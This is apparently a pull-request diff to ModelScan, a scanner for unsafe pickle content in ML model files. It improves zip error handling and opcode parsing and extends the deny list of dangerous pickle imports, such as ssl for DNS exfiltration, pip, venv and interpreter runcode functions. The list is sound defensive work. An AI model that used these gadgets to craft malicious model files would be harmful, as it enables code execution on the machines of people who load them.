Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 27 additions & 10 deletions modelscan/modelscan.py
Original file line number Diff line number Diff line change
Expand Up @@ -98,18 +98,35 @@ def _iterate_models(self, model_path: Path) -> Generator[Model, None, None]:
with zipfile.ZipFile(model.get_stream(), "r") as zip:
file_names = zip.namelist()
for file_name in file_names:
with zip.open(file_name, "r") as file_io:
file_name = f"{model.get_source()}:{file_name}"
if _is_zipfile(file_name, data=file_io):
self._errors.append(
NestedZipError(
"ModelScan does not support nested zip files.",
Path(file_name),
try:
with zip.open(file_name, "r") as file_io:
file_name = f"{model.get_source()}:{file_name}"
if _is_zipfile(file_name, data=file_io):
self._errors.append(
NestedZipError(
"ModelScan does not support nested zip files.",
Path(file_name),
)
)
continue

yield Model(file_name, file_io)
except (KeyError, RuntimeError, zipfile.BadZipFile) as e:
logger.debug(
"Skipping file %s in zip %s due to error",
file_name,
str(model.get_source()),
exc_info=True,
)
self._skipped.append(
ModelScanSkipped(
"ModelScan",
SkipCategories.BAD_ZIP,
f"Skipping file in zip due to error: {e}",
f"{model.get_source()}:{file_name}",
)
continue

yield Model(file_name, file_io)
)
continue
except (zipfile.BadZipFile, RuntimeError) as e:
logger.debug(
"Skipping zip file %s, due to error",
Expand Down
32 changes: 32 additions & 0 deletions modelscan/settings.py
Original file line number Diff line number Diff line change
Expand Up @@ -130,6 +130,38 @@ class SupportedModelFormats:
"pdb": "*",
"shutil": "*",
"asyncio": "*",
"commands": "*", # Python 2 precursor to subprocess
"functools": ["partial"],
"numpy.testing._private.utils": "*",
"ssl": "*", # DNS exfiltration via ssl.get_server_certificate()
"ensurepip": ["_run_pip"],
"idlelib.autocomplete": ["AutoComplete.get_entity", "AutoComplete.fetch_completions"],
"idlelib.calltip": ["Calltip.fetch_tip", "get_entity"],
"idlelib.debugobj": ["ObjectTreeItem.SetText"],
"idlelib.pyshell": ["ModifiedInterpreter.runcode", "ModifiedInterpreter.runcommand"],
"idlelib.run": ["Executive.runcode"],
"lib2to3.pgen2.grammar": ["Grammar.loads"],
"lib2to3.pgen2.pgen": ["ParserGenerator.make_label"],
"code": ["InteractiveInterpreter.runcode"],
"cProfile": ["runctx", "run"],
"doctest": ["debug_script"],
"profile": ["Profile.run", "Profile.runctx"],
"pydoc": ["pipepager"],
"timeit": "*",
"trace": ["Trace.run", "Trace.runctx"],
"venv": "*",
"pip": "*",
# PyTorch-related risky globals
"torch._dynamo.guards": ["GuardBuilder.get"],
"torch._inductor.codecache": "compile_file",
"torch.fx.experimental.symbolic_shapes": ["ShapeEnv.evaluate_guards_expression"],
"torch.jit.unsupported_tensor_ops": ["execWrapper"],
"torch.serialization": "load",
"torch.utils._config_module": ["ConfigModule.load_config"],
"torch.utils.bottleneck.__main__": ["run_cprofile", "run_autograd_prof"],
"torch.utils.collect_env": ["run"],
"torch.utils.data.datapipes.utils.decoder": ["basichandlers"],
"asyncio.unix_events": ["_UnixSubprocessTransport._start"],
},
"HIGH": {
"webbrowser": "*", # Includes webbrowser.open()
Expand Down
22 changes: 14 additions & 8 deletions modelscan/tools/picklescanner.py
Original file line number Diff line number Diff line change
Expand Up @@ -55,17 +55,15 @@ def _list_globals(
memo: Dict[Union[int, str], str] = {}
# Scan the data for pickle buffers, stopping when parsing fails or stops making progress
last_byte = b"dummy"
parsing_pkl_error: Optional[str] = None
while last_byte != b"":
# List opcodes
ops: List[Tuple[Any, Any, Union[int, None]]] = []
try:
ops: List[Tuple[Any, Any, Union[int, None]]] = list(
pickletools.genops(data)
)
for op in pickletools.genops(data):
ops.append(op)
except Exception as e:
# Given we can have multiple pickles in a file, we may have already successfully extracted globals from a valid pickle.
# Thus return the already found globals in the error & let the caller decide what to do.
globals_opt = globals if len(globals) > 0 else None
raise GenOpsError(str(e), globals_opt)
parsing_pkl_error = str(e)

last_byte = data.read(1)
data.seek(-1, 1)
Expand All @@ -84,7 +82,7 @@ def _list_globals(
globals.add(tuple(op_value.split(" ", 1)))
elif op_name == "STACK_GLOBAL":
values: List[str] = []
for offset in range(1, n):
for offset in range(1, n + 1):
if ops[n - offset][0].name in [
"MEMOIZE",
"PUT",
Expand All @@ -99,6 +97,9 @@ def _list_globals(
"UNICODE",
"BINUNICODE",
"BINUNICODE8",
"STRING",
"BINSTRING",
"SHORT_BINSTRING",
]:
logger.debug(
"Presence of non-string opcode, categorizing as an unknown dangerous import"
Expand All @@ -116,6 +117,11 @@ def _list_globals(
if not multiple_pickles:
break

if parsing_pkl_error is not None:
# Return the already found globals in the error & let the caller decide what to do.
globals_opt = globals if len(globals) > 0 else None
raise GenOpsError(parsing_pkl_error, globals_opt)

return globals


Expand Down